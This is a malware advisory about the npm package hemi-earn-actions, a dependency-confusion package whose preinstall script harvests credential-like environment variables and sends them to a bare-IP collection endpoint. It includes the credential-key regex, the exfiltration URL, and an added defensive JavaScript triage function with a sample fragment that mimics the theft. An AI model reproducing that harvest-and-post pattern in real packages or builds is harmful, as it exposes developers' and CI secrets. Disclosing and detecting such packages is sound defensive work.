MAL-2026-5778
Malicious code in hemi-earn-actions (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a9c2a72c75e835bc78738de0839bd4727df93d6bcb8aed2215289973996c4f3c)

On `npm install`, the package's preinstall script (postinstall.js) collects host metadata (hostname, username, cwd, npm config) and iterates `process.env`, filtering keys against the regex `/key|secret|token|pass|private|ssh|deploy|auth|api|rpc|wallet|sentry|docker|graph|slack|host/i` to harvest credential-shaped variables. The resulting JSON payload is POSTed over HTTPS to a hardcoded bare-IP endpoint, `https://185.130.46.35:8443/collect`. The package itself has no functional API (index.js is `module.exports = {}`), and the version `999.0.0` together with the description 'Internal package' fit the dependency-confusion pattern aimed at organizations whose builds resolve a private name `hemi-earn-actions` from the public registry. The harm to anyone who installs it is automatic exfiltration of CI and developer secrets to attacker-controlled infrastructure.
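The indicators listed above (install-time lifecycle hook, implausible version, "internal" description, `process.env` enumeration filtered by a credential-shaped regex, and a bare-IP exfiltration URL) can be checked mechanically before a package is allowed into a build. The following is an added example and not code from the advisory, from Amazon Inspector or from the package itself; the `assessPackage` function, its finding threshold, and the sample package.json and script fragment it is run against are all constructed for illustration.

```javascript
// Heuristic triage of an npm package's install hooks for the dependency-confusion
// credential-stealer pattern described in this advisory. Constructed example code.

// Indicator patterns, matched against the source of install-time scripts.
const ENV_ENUMERATION = /process\.env/;
// A regex literal with the /i flag whose body names credential-shaped env keys.
const ENV_KEY_FILTER = /\/[^\/\n]*(key|secret|token|pass|private|auth)[^\/\n]*\/i/;
// http(s):// followed by a bare IPv4 address instead of a hostname, optional port.
const BARE_IP_URL = /https?:\/\/\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?\/\S*/;
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// pkg: parsed package.json; scriptSources: { filename: source text } for its hook scripts.
// Returns the individual findings plus a verdict (two or more findings => suspicious).
function assessPackage(pkg, scriptSources) {
  const findings = [];
  const hooks = INSTALL_HOOKS.filter((h) => pkg.scripts && pkg.scripts[h]);
  if (hooks.length) findings.push(`runs code at install time via: ${hooks.join(", ")}`);
  // An absurdly high major version is how dependency-confusion packages win resolution.
  const major = parseInt(String(pkg.version).split(".")[0], 10);
  if (major >= 100) findings.push(`implausible version ${pkg.version}`);
  if (/internal/i.test(pkg.description || "")) findings.push("describes itself as internal");
  for (const [file, src] of Object.entries(scriptSources)) {
    if (ENV_ENUMERATION.test(src) && ENV_KEY_FILTER.test(src))
      findings.push(`${file}: enumerates process.env with a credential-shaped key filter`);
    const url = src.match(BARE_IP_URL);
    if (url) findings.push(`${file}: network call to bare-IP endpoint ${url[0]}`);
  }
  return { suspicious: findings.length >= 2, findings };
}

// Constructed sample input mirroring the advisory's description (not the real package).
const SAMPLE_PACKAGE_JSON = {
  name: "hemi-earn-actions",
  version: "999.0.0",
  description: "Internal package",
  scripts: { preinstall: "node postinstall.js" },
};
// Constructed script fragment; 'post' is a hypothetical helper, not real code.
const SAMPLE_POSTINSTALL = [
  "const keys = Object.keys(process.env)",
  "  .filter((k) => /key|secret|token|pass|auth/i.test(k));",
  'post("https://185.130.46.35:8443/collect", { keys }); // hypothetical helper',
].join("\n");

console.log(JSON.stringify(assessPackage(SAMPLE_PACKAGE_JSON, { "postinstall.js": SAMPLE_POSTINSTALL }), null, 2));
```

In a real pipeline the same function would be fed each dependency's package.json and hook scripts from the lockfile's resolved tarballs, with any `suspicious` result blocking the install for review.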
Affected packages
No fixed version published yet for hemi-earn-actions (npm). Pin to a known-safe version or switch to an alternative.